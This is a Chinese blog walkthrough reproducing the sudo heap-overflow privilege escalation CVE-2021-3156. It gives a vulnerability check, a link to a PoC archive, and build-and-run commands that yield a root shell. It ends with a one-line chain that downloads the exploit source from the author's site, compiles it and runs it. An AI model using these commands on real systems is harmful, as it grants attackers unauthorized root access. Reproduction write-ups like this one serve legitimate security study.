【漏洞复现】CVE-2021-3156漏洞复现

  • 内容
  • 相关

漏洞描述

Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。

2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。

当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。

影响的sudo版本为Sudo 1.8.2 - 1.8.31p2,Sudo 1.9.0 - 1.9.5p1,可能还需要libc2.32版本

 

 

漏洞检测

环境:ubuntu20.04.1
本人使用阿里云香港轻量应用服务器进行演示。但是ssh连接时候是使用root用户,可以在控制面板进行浏览器连接

在普通用户权限上,输入:sudoedit -s /

1.png

如果显示sudoedit: /: not a regular file,则表示该漏洞存在

 

漏洞复现

一、下载漏洞poc:
https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
下载解压后有三个文件

2.png

二、输入命令:
make && ./sudo-hax-me-a-sandwich 0

3.png

有#表示漏洞利用成功。接下来我们可以看是否是root权限

输入id

4.png

查看下版本信息

sudo --version

5.png

uname -a

6.png

漏洞利用成功!

此漏洞复现参考公众号悬剑武器库的复现文章。另外附一次性漏洞利用shell命令:

mkdir CVE-2021-3156 && cd CVE-2021-3156/ && wget www.itznxh.com/CVE-2021-3156/hax.c && wget www.itznxh.com/CVE-2021-3156/lib.c &&wget www.itznxh.com/CVE-2021-3156/Makefile && make &&./sudo-hax-me-a-sandwich 0

 




  文件名稱:CVE-2021-3156-poc

  更新時間:2021.1.31

  下載声明:提取码:G4br

立即下載

下载链接

网盘下载

提取码:G4br

本文标签:

版权声明:若无特殊注明,本文皆为《G4br1el》原创,转载请保留文章出处。

本文链接:【漏洞复现】CVE-2021-3156漏洞复现 - https://www.itznxh.com/post-42.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新